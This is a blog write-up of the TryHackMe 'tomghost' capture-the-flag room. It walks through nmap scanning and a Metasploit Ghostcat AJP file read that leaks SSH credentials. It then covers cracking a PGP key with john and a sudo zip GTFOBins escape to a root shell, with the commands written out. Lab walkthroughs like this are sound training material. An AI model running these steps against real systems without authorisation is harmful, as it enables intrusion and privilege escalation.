TryHackMe - tomghost - Write Up

Link to THM Room

Task 1

Task 1.1

» Compromise this machine and obtain user.txt

Prep:

root@ip-10-10-48-72:~# export ip=10.10.50.105
root@ip-10-10-48-72:~# echo $ip

Enumrate services with nmap

root@ip-10-10-48-72:~# sudo nmap -sSVC -n -O -T4 -A $ip -sS TCP SYN Connect -sV Propen open ports to determine services and versions -sC Runs default scripts -n No DNS resolution -O OS Detection -T4 Speed of scan/ noises it makes (0>5 loudest) -A aggressive scan

Result

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f3:c8:9f:0b:6a:c5:fe:95:54:0b:e9:e3:ba:93:db:7c (RSA)
|   256 dd:1a:09:f5:99:63:a3:43:0d:2d:90:d8:e3:e1:1f:b9 (ECDSA)
|_  256 48:d1:30:1b:38:6c:c6:53:ea:30:81:80:5d:0c:f1:05 (EdDSA)
53/tcp   open  tcpwrapped
8009/tcp open  ajp13      Apache Jserv (Protocol v1.3)
| ajp-methods: 
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http       Apache Tomcat 9.0.30
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.30
MAC Address: 02:23:E0:7A:4A:53 (Unknown)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3.13
[...]

There are some interesting ports.

Opening $ip:8080 in a browser presents us the default Tomcat page. There are some information visible like $CATALINA_HOME/conf/tomcat-users.xml. Might get handy later.

I looked into metasploit an found something called tomcat_ghostcat - well, looks familiar.

$ msfconsole

msf6 > search ajp

 #  Name                                                 Disclosure Date  Rank       Check  Description
   -  ----                                                 ---------------  ----       -----  -----------
   0  auxiliary/admin/http/tomcat_ghostcat                 2020-02-20       normal     Yes    Apache Tomcat AJP File Read

Let us go with it with the following msf commands:

msf6 > use 0
msf6 auxiliary(admin/http/tomcat_ghostcat) > set RHOSTS 10.10.50.105
RHOSTS => 10.10.50.105
msf6 auxiliary(admin/http/tomcat_ghostcat) > run

Result

[*] Running module against 10.10.50.105
[...]
  <description>
     Welcome to GhostCat
	skyfuck:*****************
  </description>

</web-app>

Some credentials! Let’s try to log into SSH!

root@ip-10-10-48-72:~# ssh skyfuck@$ip
[...]
skyfuck@ubuntu:~$ ls
credential.pgp  tryhackme.asc
skyfuck@ubuntu:~$

And we don’t have to look far. A private key and something to decrypt.

Get the files to the main machine with scp:

scp skyfuck@$ip:/home/skyfuck/* . (send from the attacking machine)

Creating a hash of the key with gpg2john and cracking it with the john.

root@ip-10-10-48-72:~# gpg2john tryhackme.asc > hashofkey

File tryhackme.asc
root@ip-10-10-48-72:~# cat hashofkey 
tryhackme:$gpg$*17*54*3072*713ee3f57cc950f8f89155679abe2476c62bbd286ded0e049f886d32d2b9eb06f482e9770c710abc2903f1ed70af6fcc22f5608760be*3*254*2*9*16*0c99d5dae8216f2155ba2abfcc71f818*65536*c8f277d2faf97480:::tryhackme <stuxnet@tryhackme.com>::tryhackme.asc

root@ip-10-10-48-72:~# john --wordlist=/usr/share/wordlists/rockyou.txt hashofkey
[...]
Press 'q' or Ctrl-C to abort, almost any other key for status
**********        (tryhackme)
1g 0:00:00:00 DONE (2024-02-20 17:16) 5.882g/s 6305p/s 6305c/s 6305C/s chinita..alexandru
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Let us decrypt the file credential.pgp


root@ip-10-10-48-72:~# gpg --import tryhackme.asc
gpg: /root/.gnupg/trustdb.gpg: trustdb created
gpg: key 8F3DA3DEC6707170: public key "tryhackme <stuxnet@tryhackme.com>" imported
gpg: key 8F3DA3DEC6707170: secret key imported
gpg: key 8F3DA3DEC6707170: "tryhackme <stuxnet@tryhackme.com>" not changed
gpg: Total number processed: 2
gpg:               imported: 1
gpg:              unchanged: 1
gpg:       secret keys read: 1
gpg:   secret keys imported: 1


root@ip-10-10-48-72:~# gpg --decrypt credential.pgp
gpg: WARNING: cypher algorithm CAST5 not found in recipient preferences
gpg: encrypted with 1024-bit ELG key, ID 61E104A66184FBCC, created 2020-03-11
      "tryhackme <stuxnet@tryhackme.com>"
merlin:*****************************************************************

And more credentials - SSH yet again.

root@ip-10-10-48-72:~# ssh merlin@$ip
merlin@10.10.50.105's password: 

[...]

merlin@ubuntu:~$ ls
user.txt

merlin@ubuntu:~$ cat user.txt 
***{*****************}

Task 1.2

» Escalate privileges and obtain root.txt

Let us check what we can do:

merlin@ubuntu:~$ sudo -l
Matching Defaults entries for merlin on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User merlin may run the following commands on ubuntu:
    (root : root) NOPASSWD: /usr/bin/zip
merlin@ubuntu:~$

Let’s hop over to https://gtfobins.github.io and see what we can do with zip.

Some ‘brute-forcing’ later and I got in with:

merlin@ubuntu:~$ TF=$(mktemp -u)
merlin@ubuntu:~$ sudo zip $TF /etc/hosts -T -TT 'sh #'
  adding: etc/hosts (deflated 31%)
# whoami
root

Getting the flag.

# cd /root/
# ls
root.txt  ufw
# cat ./root.txt
***{*********}
Most recent Articles:
  • Notice Board 003: Progress is Progress
  • How to: Cisco ISE backup to SFTP repository with public key authentication
  • Dummy IP & MAC Addresses for Documentation & Sanitization
  • Deploying ISSO Commenting System for Static Content using Docker
  • Generate a Vanity v3 Hidden Service Onion Address with mkp224o